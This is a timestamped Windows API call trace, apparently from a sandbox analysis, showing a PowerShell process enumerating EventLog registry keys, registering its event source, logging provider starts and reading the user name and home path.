	[0538.592] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x358) returned 0x0
	[0538.592] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0538.592] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x35c) returned 0x0
	[0538.593] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0538.593] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x360) returned 0x0
	[0538.593] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.624] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x364) returned 0x0
	[0539.624] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.624] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x368) returned 0x0
	[0539.624] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.624] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x36c) returned 0x0
	[0539.624] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.624] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x370) returned 0x0
	[0539.624] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.624] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x374) returned 0x0
	[0539.625] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.625] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x378) returned 0x0
	[0539.625] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x37c) returned 0x0
	[0539.625] RegCloseKey (hKey=0x37c) returned 0x0
	[0539.625] RegCloseKey (hKey=0x354) returned 0x0
	[0539.626] RegCloseKey (hKey=0x378) returned 0x0
	[0539.627] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1a8 | out: phkResult=0x12d1a8*=0x378) returned 0x0
	[0539.627] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.627] CoTaskMemFree (pv=0x0) 
	[0539.627] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.627] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.628] CoTaskMemFree (pv=0x301a20) 
	[0539.628] CoTaskMemFree (pv=0x0) 
	[0539.628] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.628] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.628] CoTaskMemFree (pv=0x301a20) 
	[0539.628] CoTaskMemFree (pv=0x0) 
	[0539.628] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.628] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.628] CoTaskMemFree (pv=0x301a20) 
	[0539.628] CoTaskMemFree (pv=0x0) 
	[0539.628] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.628] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.628] CoTaskMemFree (pv=0x301a20) 
	[0539.628] CoTaskMemFree (pv=0x0) 
	[0539.628] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.628] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.629] CoTaskMemFree (pv=0x301a20) 
	[0539.629] CoTaskMemFree (pv=0x0) 
	[0539.629] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.629] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.629] CoTaskMemFree (pv=0x301a20) 
	[0539.629] CoTaskMemFree (pv=0x0) 
	[0539.629] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.629] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.629] CoTaskMemFree (pv=0x301a20) 
	[0539.629] CoTaskMemFree (pv=0x0) 
	[0539.629] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.629] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.629] CoTaskMemFree (pv=0x301a20) 
	[0539.629] CoTaskMemFree (pv=0x0) 
	[0539.629] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.629] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.630] CoTaskMemFree (pv=0x301a20) 
	[0539.630] CoTaskMemFree (pv=0x0) 
	[0539.630] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x354) returned 0x0
	[0539.630] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.630] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x37c) returned 0x0
	[0539.630] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.630] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x380) returned 0x0
	[0539.630] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.630] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x384) returned 0x0
	[0539.630] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.630] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x388) returned 0x0
	[0539.631] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.631] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x38c) returned 0x0
	[0539.631] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.631] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x390) returned 0x0
	[0539.631] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.631] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x394) returned 0x0
	[0539.631] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x0) returned 0x2
	[0539.631] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x398) returned 0x0
	[0539.631] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x39c) returned 0x0
	[0539.631] RegCloseKey (hKey=0x39c) returned 0x0
	[0539.632] RegCloseKey (hKey=0x378) returned 0x0
	[0539.632] RegCloseKey (hKey=0x398) returned 0x0
	[0539.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d178 | out: phkResult=0x12d178*=0x398) returned 0x0
	[0539.633] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.633] CoTaskMemFree (pv=0x0) 
	[0539.633] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.633] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.633] CoTaskMemFree (pv=0x301a20) 
	[0539.633] CoTaskMemFree (pv=0x0) 
	[0539.633] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.633] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.633] CoTaskMemFree (pv=0x301a20) 
	[0539.633] CoTaskMemFree (pv=0x0) 
	[0539.633] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.633] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.633] CoTaskMemFree (pv=0x301a20) 
	[0539.633] CoTaskMemFree (pv=0x0) 
	[0539.633] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.633] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.634] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.634] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.634] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.634] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.634] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.634] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.634] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.634] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.634] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0539.634] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x301a20, lpcchName=0x12d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0539.634] CoTaskMemFree (pv=0x301a20) 
	[0539.634] CoTaskMemFree (pv=0x0) 
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x378) returned 0x0
	[0539.635] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x39c) returned 0x0
	[0539.635] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3a0) returned 0x0
	[0539.635] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3a4) returned 0x0
	[0539.635] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3a8) returned 0x0
	[0539.635] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.635] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3ac) returned 0x0
	[0539.636] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.636] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3b0) returned 0x0
	[0539.636] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.636] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3b4) returned 0x0
	[0539.636] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x0) returned 0x2
	[0539.636] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3b8) returned 0x0
	[0539.636] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1d8 | out: phkResult=0x12d1d8*=0x3bc) returned 0x0
	[0539.636] RegCloseKey (hKey=0x3bc) returned 0x0
	[0539.636] RegCloseKey (hKey=0x398) returned 0x0
	[0539.637] RegCloseKey (hKey=0x3b8) returned 0x0
	[0539.644] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9f0008
	[0540.748] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9bc58*="WSMan", lpRawData=0x2e9b9c8) returned 1
	[0540.749] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.749] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.751] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0540.752] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0540.752] CoTaskMemFree (pv=0x1b848210) 
	[0540.752] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0540.752] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0540.752] CoTaskMemFree (pv=0x301a20) 
	[0540.753] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea1190*="Alias", lpRawData=0x2ea0f20) returned 1
	[0540.754] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.754] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.758] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0540.758] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0540.759] CoTaskMemFree (pv=0x1b848210) 
	[0540.759] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0540.759] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0540.759] CoTaskMemFree (pv=0x301a20) 
	[0540.760] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea6788*="Environment", lpRawData=0x2ea6518) returned 1
	[0540.761] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.761] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.762] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.762] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0540.762] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.762] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.762] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0540.762] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0540.763] SetErrorMode (uMode=0x1) returned 0x1
